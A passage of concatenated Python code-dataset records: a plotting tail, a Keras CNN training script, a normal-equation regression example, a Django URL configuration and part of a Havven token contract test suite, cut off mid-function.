plt.title(\"Interpolation of 1-minute Points\")\n plt.plot(np.linspace(0, len(interpolated_g),num=len(interpolated_g),endpoint=False), interpolated_g, label=\"interpolated points\")\n plt.plot(np.linspace(0, len(interpolated_g),num=len(interpolated_g),endpoint=False), avg_line_g, label=\"cumulative average power points\")\n plt.scatter(np.linspace(0, 30*len(power_g),num=len(power_g),endpoint=False), power_g, label=\"inferred average power from data\")\n plt.legend()\n plt.xlabel(\"Time Elapsed (min)\")\n plt.ylabel(\"Power Fraction of Rated Capacity\")\n plt.savefig(\"interpolation_example.pdf\")\n plt.show()\n \n energy_t_interpolated = np.log((1/60)*np.cumsum(interpolated)*max_power)\n energy_t_data = np.log((1/2)*np.cumsum(power)*max_power )\n \n plt.figure()\n plt.title(\"Log of Cumulative Energy for Interpolated and Real Data\")\n plt.ylabel(r\"ln( Energy/[kWh] )\")\n plt.xlabel(\"Time Elapsed (min)\")\n plt.plot(np.linspace(0, len(energy_t_interpolated),num=len(energy_t_interpolated),endpoint=False), energy_t_interpolated)\n plt.plot(np.linspace(0, 30*len(energy_t_data),num=len(energy_t_data),endpoint=False), energy_t_data)\n plt.savefig(\"energy_cons.pdf\")\n else:\n pass\n\n# zero loss when IT = 0\n\nloss_a[0]=0\n\nplt.figure()\nplt.plot(throttle_a,loss_a)\nplt.title(\"Percentage Energy Loss as a funciton of IT Sizing\")\nplt.ylabel(r\"Percentage Energy Loss (%)\")\nplt.xlabel(\"IT sizing as a Fraction of Annual Average Power\")\nplt.savefig(\"loss_load.pdf\")\n\"\"\"\n\n","sub_path":"monthly_aggregation_loss.py","file_name":"monthly_aggregation_loss.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487278542","text":"import cv2\nimport keras\nimport tensorflow as tf\nfrom keras.datasets import mnist, cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.models import load_model\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.optimizers import Adam\nfrom keras.losses import categorical_crossentropy\nimport os\nfrom time import time\nimport numpy as np\n\nimport sys\nsys.path.append('../')\n\nfrom utils import show_history, rgb2gray, bgr2gray, save\n\nuse_mnist = True\n\nname = \"mnist\" if use_mnist else \"cifar10\"\nbatch_size = 16\nnum_classes = 10\nepochs = 5\ndir_save = os.path.join(os.getcwd(), 'models')\ntrain = True\n\nprint(\"Dataset in use: \", name.upper())\n\n# Loading test and training datasets\nif use_mnist:\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n print(x_train.shape)\n x_train = np.reshape(x_train, np.append(x_train.shape, (1)))\n print(x_train.shape)\n x_test = np.reshape(x_test, np.append(x_test.shape, (1)))\nelse:\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\nsave(name + \"_train.jpg\", cv2.hconcat([x_train[0], x_train[1], x_train[2], x_train[3], x_train[4]]))\nsave(name + \"_test.jpg\", cv2.hconcat([x_test[0], x_test[1], x_test[2], x_test[3], x_test[4]]))\nprint('X Train', x_train.shape, ' - X Test', x_test.shape)\nprint('Y Train', y_train.shape, ' - Y Test', y_test.shape)\nprint('First 5 labels, train:', y_train[0], y_train[1], y_train[2], y_train[3], y_train[4])\nprint('First 5 labels, test:', y_test[0], y_test[1], y_test[2], y_test[3], y_test[4])\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = 
keras.utils.to_categorical(y_test, num_classes)\n\n\nmodel_name = name + \".h5\"\ncheckpoint = ModelCheckpoint(model_name, monitor='val_loss', mode='min', verbose=1, save_best_only=True)\n\n\ndef create_model_1():\n model = Sequential()\n # Convolutional layers\n model.add(Conv2D(64, (7, 7), input_shape=x_train.shape[1:], activation='relu'))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=128, kernel_size=(5,5), padding=\"same\"))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=192, kernel_size=(3,3), strides=(1,1), padding=\"same\", activation = \"relu\"))\n model.add(Conv2D(filters=128, kernel_size=(3,3), strides=(1,1), padding=\"same\", activation = \"relu\"))\n\n model.add(MaxPooling2D(pool_size=(3,3), strides=(2,2), padding=\"valid\"))\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units = 1024, activation = \"relu\"))\n model.add(Dense(units = 256, activation = \"relu\"))\n\n\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n\n return model\n\ndef create_model_2_lenet():\n model = Sequential()\n # Convolutional layers\n\n model.add(Conv2D(filters=6, kernel_size=(5, 5), activation='relu', padding='same', input_shape=x_train.shape[1:]))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=16, kernel_size=(5, 5), activation='relu'))\n model.add(MaxPooling2D())\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units=120, activation='relu'))\n model.add(Dense(units=84, activation='relu'))\n model.add(Dense(units=num_classes, activation='softmax'))\n\n return model\n\ndef create_model_2_lenet_bigger():\n model = Sequential()\n # Convolutional layers\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=x_train.shape[1:]))\n model.add(AveragePooling2D())\n\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu'))\n model.add(AveragePooling2D())\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units=512, activation='relu'))\n model.add(Dense(units=256, activation='relu'))\n model.add(Dense(units=num_classes, activation = 'softmax'))\n\n return model\n\n\nif train:\n model = create_model_2_lenet()\n model.summary()\n opt = Adam()\n\n model.compile(loss=categorical_crossentropy, optimizer=opt, metrics=['accuracy'])\n start = time()\n history_object = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_data=(x_test, y_test), shuffle=True, callbacks=[checkpoint])\n print(\"Training time:\", time()-start)\n\n show_history(history_object)\nelse:\n model = load_model(os.path.join(dir_save, model_name))\n model.summary()\n print(\"H5 Output: \" + str(model.output.op.name))\n print(\"H5 Input: \" + str(model.input.op.name))\n\n # Score trained model.\n scores = model.evaluate(x_test, y_test, verbose=1)\n print('Validation loss:', scores[0])\n print('Validation accuracy:', scores[1])\n\n\n","sub_path":"Chapter4/01_cnn.py","file_name":"01_cnn.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"354643391","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_ = np.genfromtxt(\"data.csv\", delimiter=\",\")\n# add a dimension (np.newaxis turns each column into shape (n, 1))\n# samples\nx_data = data_[:, 0, np.newaxis]\n# labels\ny_data = data_[:, 1, np.newaxis]\n\n# plt.scatter(x_data, y_data)\n# plt.show()\n\n# print(np.mat(x_data).shape)\n# => np.mat => converts to a matrix with many rows and one column\n\n# np.ones((100, 1))\n# => builds a 2-D np array, 100 rows by 1 column, all elements 1\n\n# y = a + b*x1 + c*x2 ... => y = a*x0 + b*x1 + c*x2 ...\n# x0 is 1\n\n# add the x0 column to the samples\nX_data = np.concatenate((np.ones((len(x_data), 1)), x_data), axis=1)\n\n\n# np.concatenate\n# => 100 rows x 1 col plus 100 rows x 1 col => 100 rows x 2 cols\n# => axis is the position along which to concatenate\n# print(X_data.shape)\n\n\n# solve for the regression parameters with the normal equation method\ndef weights(xArr, yArr):\n # convert to matrices\n xMat = np.mat(xArr)\n yMat = np.mat(yArr)\n # matrix multiplication\n xTx = xMat.T * xMat\n\n if np.linalg.det(xTx) == 0.0:\n print(\"np.linalg.det(xTx) == 0.0 !!!\")\n return None\n return xTx.I * xMat.T * yMat\n
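# Note added for clarity: weights() above implements the normal equation\n# w = (X^T X)^(-1) X^T y.\n# Illustrative cross-check with NumPy's least-squares solver (should agree\n# with ws computed below, up to numerical precision):\n#\n# w_check, *_ = np.linalg.lstsq(X_data, y_data, rcond=None)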
\n\nws = weights(X_data, y_data)\nx_test = np.array([[0], [1]])\ny_test = ws[0] + x_test * ws[1]\nplt.plot(x_data, y_data, 'b.')\nplt.plot(x_test, y_test, 'r')\nplt.show()\n","sub_path":"p15/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"59500559","text":"from django.urls import path\nfrom . import views\n\nhandler404 = views.handler404\nhandler500 = views.handler500\nhandler403 = views.handler403\nhandler400 = views.handler400\n\nurlpatterns = [\n\n # Core Views\n path('', views.index_view, name='home'),\n path('contact/', views.contact_view, name='contact'),\n path('faq/', views.faq_view, name='faq'),\n path('about/', views.about_view, name='about'),\n path('terms/', views.terms_view, name='terms'),\n\n # Shop Views\n path('mystery/', views.mystery_view, name='mystery'),\n path('shop/', views.shop_view, name='shop'),\n path('shop/quick_search/', views.quick_search, name='shop_quick_search'),\n path('cart/', views.cart_view, name='cart'),\n path('checkout/', views.checkout_view, name='checkout'),\n path('payment/', views.payment_view, name='payment'),\n path('payment_error/', views.payment_error_view, name='payment_error'),\n path('product//', views.product_view, name='product'),\n path('add_to_mystery/', views.add_to_mystery,\n name='add_to_cart_mystery'),\n path('remove_from_mystery/', views.remove_from_mystery,\n name='remove_from_mystery'),\n path('add_to_cart//', views.add_to_cart, name='add_to_cart'),\n path('remove_from_cart//', views.remove_from_cart,\n name='remove_from_cart'),\n path('clear_cart/', views.clear_cart, name='clear_cart'),\n\n # data responses\n path('makes/', views.send_vehicle_makes, name='makes'),\n path('models/', views.send_vehicle_models, name='models'),\n path('tyres/', views.get_tyres, name='tyres'),\n \n # Dev views\n path('dev/', views.dev_view, name='dev')\n]\n\n\n\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"479195279","text":"import random\n\nfrom utils.deployutils import (\n W3, UNIT, MASTER, DUMMY,\n mine_txs, mine_tx,\n fresh_accounts, fresh_account,\n attempt_deploy,\n take_snapshot, restore_snapshot,\n fast_forward, to_seconds\n)\nfrom utils.testutils import (\n HavvenTestCase, block_time,\n get_event_data_from_log, generate_topic_event_map,\n ZERO_ADDRESS\n)\nfrom tests.contract_interfaces.havven_interface import PublicHavvenInterface\nfrom tests.contract_interfaces.nomin_interface import PublicNominInterface\n\n\ndef setUpModule():\n print(\"Testing Havven...\")\n print(\"=================\")\n print()\n\n\ndef tearDownModule():\n print()\n print()\n\n\nclass TestHavven(HavvenTestCase):\n def setUp(self):\n self.snapshot = take_snapshot()\n\n def tearDown(self):\n restore_snapshot(self.snapshot)\n\n @classmethod\n def deployContracts(cls):\n print(\"Deployment initiated.\\n\")\n\n sources = 
[\"tests/contracts/PublicHavven.sol\", \"contracts/Nomin.sol\",\n \"contracts/HavvenEscrow.sol\"]\n\n compiled, cls.event_maps = cls.compileAndMapEvents(sources)\n\n # Deploy contracts\n havven_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n nomin_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n proxied_havven = W3.eth.contract(address=havven_proxy.address, abi=compiled['PublicHavven']['abi'])\n proxied_nomin = W3.eth.contract(address=nomin_proxy.address, abi=compiled['Nomin']['abi'])\n\n havven_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n nomin_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n havven_contract, hvn_txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, cls.initial_price, [], ZERO_ADDRESS])\n hvn_block = W3.eth.blockNumber\n nomin_contract, nom_txr = attempt_deploy(compiled, 'Nomin',\n MASTER,\n [nomin_proxy.address, nomin_tokenstate.address, havven_contract.address, 0, MASTER])\n escrow_contract, escrow_txr = attempt_deploy(compiled, 'HavvenEscrow',\n MASTER,\n [MASTER, havven_contract.address])\n\n # Hook up each of those contracts to each other\n mine_txs([\n havven_tokenstate.functions.setBalanceOf(havven_contract.address, 100000000 * UNIT).transact({'from': MASTER}),\n havven_tokenstate.functions.setAssociatedContract(havven_contract.address).transact({'from': MASTER}),\n nomin_tokenstate.functions.setAssociatedContract(nomin_contract.address).transact({'from': MASTER}),\n havven_proxy.functions.setTarget(havven_contract.address).transact({'from': MASTER}),\n nomin_proxy.functions.setTarget(nomin_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setNomin(nomin_contract.address).transact({'from': MASTER}),\n nomin_contract.functions.setHavven(havven_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setEscrow(escrow_contract.address).transact({'from': MASTER})\n ])\n\n havven_event_dict = generate_topic_event_map(compiled['PublicHavven']['abi'])\n\n print(\"\\nDeployment complete.\\n\")\n return havven_proxy, proxied_havven, nomin_proxy, proxied_nomin, havven_contract, nomin_contract, escrow_contract, hvn_block, havven_event_dict\n\n @classmethod\n def setUpClass(cls):\n # to avoid overflowing in the negative direction (now - feePeriodDuration * 2)\n fast_forward(weeks=102)\n\n cls.initial_price = UNIT // 2\n\n cls.havven_proxy, cls.proxied_havven, cls.nomin_proxy, cls.proxied_nomin, \\\n cls.havven_contract, cls.nomin_contract, cls.escrow_contract, cls.construction_block, \\\n cls.havven_event_dict = cls.deployContracts()\n\n cls.event_map = cls.event_maps['Havven']\n\n cls.havven = PublicHavvenInterface(cls.proxied_havven, \"Havven\") \n cls.nomin = PublicNominInterface(cls.proxied_nomin, \"Nomin\")\n\n cls.unproxied_havven = PublicHavvenInterface(cls.havven_contract, \"UnproxiedHavven\")\n\n cls.initial_time = cls.havven.lastFeePeriodStartTime()\n cls.time_fast_forwarded = 0\n\n cls.base_havven_price = UNIT\n\n cls.sd_duration = 4 * 7 * 24 * 60 * 60\n\n def havven_updatePrice(self, sender, price, time):\n return mine_tx(self.havven_contract.functions.updatePrice(price, time).transact({'from': sender}), 'updatePrice', 'Havven')\n\n ###\n # Test inherited Owned - Should be the same test_Owned.py\n ###\n def test_owner_is_master(self):\n self.assertEqual(self.havven.owner(), MASTER)\n\n def test_change_owner(self):\n old_owner = self.havven.owner()\n 
new_owner = DUMMY\n\n self.havven.nominateNewOwner(old_owner, new_owner)\n self.havven.acceptOwnership(new_owner)\n self.assertEqual(self.havven.owner(), new_owner)\n\n # reset back to old owner\n self.havven.nominateNewOwner(new_owner, old_owner)\n self.havven.acceptOwnership(old_owner)\n self.assertEqual(self.havven.owner(), old_owner)\n\n def test_change_invalid_owner(self):\n invalid_account = DUMMY\n self.assertReverts(self.havven.nominateNewOwner, invalid_account, invalid_account)\n\n ###\n # Test inherited ExternStateToken\n ###\n # Constuctor\n def test_ExternStateToken_constructor(self):\n total_supply = 10 ** 8 * UNIT\n self.assertEqual(self.havven.name(), \"Havven\")\n self.assertEqual(self.havven.symbol(), \"HAV\")\n self.assertEqual(self.havven.totalSupply(), total_supply)\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), total_supply)\n\n # Approval\n def test_approve(self):\n owner = MASTER\n spender = DUMMY\n self.havven.approve(owner, spender, UNIT)\n self.assertEqual(self.havven.allowance(owner, spender), UNIT)\n self.havven.approve(owner, spender, 0)\n self.assertEqual(self.havven.allowance(owner, spender), 0)\n\n #\n ##\n ###\n # Test Havven\n ###\n ###\n # Constructor\n ###\n def test_constructor(self):\n fee_period = self.havven.feePeriodDuration()\n self.assertEqual(fee_period, to_seconds(weeks=4))\n self.assertGreater(block_time(), 2 * fee_period)\n self.assertEqual(self.havven.MIN_FEE_PERIOD_DURATION(), to_seconds(days=1))\n self.assertEqual(self.havven.MAX_FEE_PERIOD_DURATION(), to_seconds(weeks=26))\n self.assertEqual(self.havven.lastFeesCollected(), 0)\n self.assertEqual(self.havven.nomin(), self.nomin_contract.address)\n self.assertEqual(self.havven.escrow(), self.escrow_contract.address)\n self.assertEqual(self.havven.decimals(), 18)\n self.assertEqual(self.havven.feePeriodStartTime(), block_time(self.construction_block))\n self.assertEqual(self.havven.lastFeePeriodStartTime(), block_time(self.construction_block) - fee_period)\n self.assertEqual(self.havven.lastFeesCollected(), 0)\n self.assertEqual(self.havven.price(), self.initial_price)\n\n def test_constructor_migration(self):\n # Ensure issuers list updates issued balances properly... 
update deploycontracts above.\n sources = [\"tests/contracts/PublicHavven.sol\", \"contracts/Nomin.sol\",\n \"contracts/HavvenEscrow.sol\"]\n\n print()\n compiled, event_maps = self.compileAndMapEvents(sources)\n\n # Initial issued nomin balances\n #issuer_addresses = [f\"0x{'0'*39}{i+1}\" for i in range(10)]\n issuers_all = fresh_accounts(54)\n issuers = issuers_all[:2]\n issuer_balances = [77 * UNIT * i for i in range(10)]\n total_nomins = sum(issuer_balances)\n\n # Deploy contracts\n havven_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n nomin_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n proxied_havven = W3.eth.contract(address=havven_proxy.address, abi=compiled['PublicHavven']['abi'])\n proxied_nomin = W3.eth.contract(address=nomin_proxy.address, abi=compiled['Nomin']['abi'])\n\n havven_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n nomin_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n havven_contract, hvn_txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, UNIT, [], ZERO_ADDRESS])\n hvn_block = W3.eth.blockNumber\n nomin_contract, nom_txr = attempt_deploy(compiled, 'Nomin',\n MASTER,\n [nomin_proxy.address, nomin_tokenstate.address, havven_contract.address, 0, MASTER])\n escrow_contract, escrow_txr = attempt_deploy(compiled, 'HavvenEscrow',\n MASTER,\n [MASTER, havven_contract.address])\n\n mine_txs([\n havven_tokenstate.functions.setBalanceOf(havven_contract.address, 100000000 * UNIT).transact({'from': MASTER}),\n havven_tokenstate.functions.setAssociatedContract(havven_contract.address).transact({'from': MASTER}),\n nomin_tokenstate.functions.setAssociatedContract(nomin_contract.address).transact({'from': MASTER}),\n havven_proxy.functions.setTarget(havven_contract.address).transact({'from': MASTER}),\n nomin_proxy.functions.setTarget(nomin_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setNomin(nomin_contract.address).transact({'from': MASTER}),\n nomin_contract.functions.setHavven(havven_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setEscrow(escrow_contract.address).transact({'from': MASTER})\n ])\n\n havven_event_dict = generate_topic_event_map(compiled['PublicHavven']['abi'])\n\n havven = PublicHavvenInterface(proxied_havven, \"Havven\") \n nomin = PublicNominInterface(proxied_nomin, \"Nomin\")\n\n for i in range(len(issuers)):\n issuer = issuers[i]\n havven.endow(MASTER, issuer, 1000 * UNIT)\n havven.setIssuer(MASTER, issuer, True)\n mine_txs([havven_contract.functions.updatePrice(UNIT, block_time() + 1).transact({'from': MASTER})])\n havven.issueNomins(issuer, i * 10 * UNIT)\n fast_forward(havven.feePeriodDuration() // 20)\n\n for i in range(len(issuers)):\n issuer = issuers[i]\n havven.endow(MASTER, issuer, 1000 * UNIT)\n havven.setIssuer(MASTER, issuer, True)\n mine_txs([havven_contract.functions.updatePrice(UNIT, block_time() + 1).transact({'from': MASTER})])\n havven.issueNomins(issuer, (len(issuers) - 1 - i) * 5 * UNIT)\n fast_forward(havven.feePeriodDuration() // 15)\n\n new_havven_contract, txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, UNIT, issuers_all, havven_contract.address])\n new_havven = PublicHavvenInterface(new_havven_contract, \"Havven\")\n\n self.assertEqual(havven.totalIssuanceData(), new_havven.totalIssuanceData())\n 
self.assertEqual(havven.feePeriodStartTime(), new_havven.feePeriodStartTime())\n self.assertEqual(havven.lastFeePeriodStartTime(), new_havven.lastFeePeriodStartTime())\n\n for issuer in issuers:\n self.assertEqual(havven.isIssuer(issuer), new_havven.isIssuer(issuer))\n self.assertEqual(havven.issuanceData(issuer), new_havven.issuanceData(issuer))\n self.assertEqual(havven.nominsIssued(issuer), new_havven.nominsIssued(issuer))\n\n ###\n # Mappings\n ###\n # currentBalanceSum\n def test_currentBalanceSum(self):\n # Testing the value of currentBalanceSum works as intended,\n # Further testing involving this and fee collection will be done\n # in scenario testing\n fee_period = self.havven.feePeriodDuration()\n delay = int(fee_period / 10)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n start_amt = UNIT * 50\n\n self.havven.endow(MASTER, alice, start_amt)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.issueNomins(alice, start_amt)\n\n self.assertEqual(self.havven.balanceOf(alice), start_amt)\n self.assertEqual(self.nomin.balanceOf(alice), start_amt)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n start_time = block_time()\n fast_forward(delay)\n self.havven.recomputeLastAverageBalance(alice, alice)\n end_time = block_time()\n balance_sum = (end_time - start_time) * start_amt\n self.assertEqual(\n self.havven.issuanceCurrentBalanceSum(alice),\n balance_sum\n )\n self.havven.burnNomins(alice, start_amt)\n self.assertEqual(self.nomin.balanceOf(alice), 0)\n fast_forward(delay)\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(\n self.havven.issuanceCurrentBalanceSum(alice), balance_sum\n )\n\n # lastAverageBalance\n def test_lastAverageBalance(self):\n # set the block time to be at least 30seconds away from the end of the fee_period\n fee_period = self.havven.feePeriodDuration()\n\n # fast forward next block with some extra padding\n delay = fee_period + 1\n fast_forward(delay)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n start_amt = UNIT * 50\n\n self.havven.endow(MASTER, alice, start_amt)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n tx_receipt = self.havven.issueNomins(alice, start_amt)\n\n self.assertEqual(self.havven.balanceOf(alice), start_amt)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n self.assertEqual(self.havven.issuanceLastAverageBalance(alice), 0)\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(tx_receipt['blockNumber']))\n fast_forward(delay)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n fast_forward(fee_period // 2)\n\n tx_receipt = self.havven.recomputeLastAverageBalance(alice, alice)\n block_number = tx_receipt['blockNumber']\n\n duration_since_rollover = block_time(block_number) - self.havven.feePeriodStartTime()\n balance_sum = duration_since_rollover * start_amt\n\n actual = self.havven.issuanceCurrentBalanceSum(alice)\n expected = balance_sum\n self.assertClose(\n actual, expected\n )\n\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining - 5)\n self.havven.burnNomins(alice, start_amt // 2)\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() 
- block_time()\n fast_forward(time_remaining + 10)\n\n self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven.recomputeLastAverageBalance(alice, alice)\n\n actual = self.havven.issuanceLastAverageBalance(alice)\n expected = (start_amt * delay) // (self.havven.feePeriodStartTime() - self.havven.lastFeePeriodStartTime())\n self.assertClose(\n actual, expected\n )\n\n def test_lastAverageBalanceFullPeriod(self):\n alice = fresh_account()\n self.havven.setIssuer(MASTER, alice, True)\n fee_period = self.havven.feePeriodDuration()\n\n # Alice will initially have 20 havvens\n self.havven.endow(MASTER, alice, 20 * UNIT)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.issueNomins(alice, 20 * UNIT)\n\n self.assertEqual(self.havven.balanceOf(alice), 20 * UNIT)\n self.assertEqual(self.nomin.balanceOf(alice), 20 * UNIT)\n\n # Fastforward until just before a fee period rolls over.\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 50)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven_updatePrice(MASTER, UNIT, block_time())\n issue_receipt = self.havven.issueNomins(alice, 0) \n\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(issue_receipt['blockNumber']))\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n # roll over the full period\n fast_forward(fee_period + 50)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n transfer_receipt = self.havven.issueNomins(alice, 0)\n\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(transfer_receipt['blockNumber'])) \n self.assertEqual(self.havven.issuanceLastAverageBalance(alice), 20 * UNIT)\n\n # Try a half-and-half period\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 50)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.havven.burnNomins(alice, 10 * UNIT)\n\n fast_forward(fee_period // 2 + 10)\n self.havven.burnNomins(alice, 10 * UNIT)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n fast_forward(fee_period // 2 + 10)\n\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(self.havven.issuanceLastAverageBalance(alice), 5 * UNIT)\n\n def test_arithmeticSeriesBalance(self):\n alice = fresh_account()\n fee_period = self.havven.feePeriodDuration()\n n = 50\n\n self.havven.endow(MASTER, alice, n * UNIT)\n self.havven_updatePrice(self.havven.oracle(), UNIT, block_time())\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.issueNomins(alice, n * UNIT // 20)\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 5)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n for _ in range(n):\n self.havven.burnNomins(alice, UNIT // 20) \n fast_forward(fee_period // n)\n\n fast_forward(n) # fast 
forward allow the rollover to happen\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(self.havven.issuanceLastAverageBalance(alice), n * (n - 1) * UNIT // (2 * n * 20), precision=3)\n\n def test_averageBalanceSum(self):\n alice, bob, carol = fresh_accounts(3)\n fee_period = self.havven.feePeriodDuration()\n\n self.havven.endow(MASTER, alice, UNIT)\n self.havven.endow(MASTER, bob, UNIT)\n self.havven.endow(MASTER, carol, UNIT)\n\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.setIssuer(MASTER, bob, True)\n self.havven.setIssuer(MASTER, carol, True)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n\n fast_forward(fee_period + 1)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n\n for i in range(10):\n self.havven_updatePrice(MASTER, UNIT, block_time() + 1)\n a_weight = random.random()\n b_weight = random.random()\n c_weight = random.random()\n tot = a_weight + b_weight + c_weight\n\n self.havven.issueNomins(alice, max(1, int(UNIT * a_weight / tot)))\n self.havven.issueNomins(bob, max(1, int(UNIT * b_weight / tot)))\n self.havven.issueNomins(carol, max(1, int(UNIT * c_weight / tot)))\n fast_forward(fee_period // 10 - 1)\n self.havven.burnNomins(alice, max(1, int(UNIT * a_weight / tot)))\n self.havven.burnNomins(bob, max(1, int(UNIT * b_weight / tot)))\n self.havven.burnNomins(carol, max(1, int(UNIT * c_weight / tot)))\n fast_forward(11)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.havven.recomputeLastAverageBalance(bob, bob)\n self.havven.recomputeLastAverageBalance(carol, carol)\n\n total_average = self.havven.issuanceLastAverageBalance(alice) + \\\n self.havven.issuanceLastAverageBalance(bob) + \\\n self.havven.issuanceLastAverageBalance(carol)\n\n self.assertClose(UNIT, total_average, precision=3)\n\n # lastModified - tested above\n # hasWithdrawnFees - tested in test_FeeCollection.py\n # lastFeesCollected - tested in test_FeeCollection.py\n\n ###\n # Contract variables\n ###\n # feePeriodStartTime - tested above\n # feePeriodDuration - tested above\n # MIN_FEE_PERIOD_DURATION - constant, checked in constructor test\n\n ###\n # Functions\n ###\n\n # setNomin\n def test_setNomin(self):\n alice = fresh_account()\n self.havven.setNomin(MASTER, alice)\n self.assertEqual(self.havven.nomin(), alice)\n\n def test_invalidSetNomin(self):\n alice = fresh_account()\n self.assertReverts(self.havven.setNomin, alice, alice)\n\n # setEscrow\n def test_setEscrow(self):\n alice = fresh_account()\n self.havven.setEscrow(MASTER, alice)\n self.assertEqual(self.havven.escrow(), alice)\n\n def test_invalidSetEscrow(self):\n alice = fresh_account()\n self.assertReverts(self.havven.setEscrow, alice, alice)\n\n # setIssuanceRatio\n def test_setIssuanceRatio(self):\n self.havven.setIssuanceRatio(MASTER, 3 * UNIT // 10)\n self.assertEqual(self.havven.issuanceRatio(), 3 * UNIT // 10)\n\n def test_setIssuanceRatio_max(self):\n 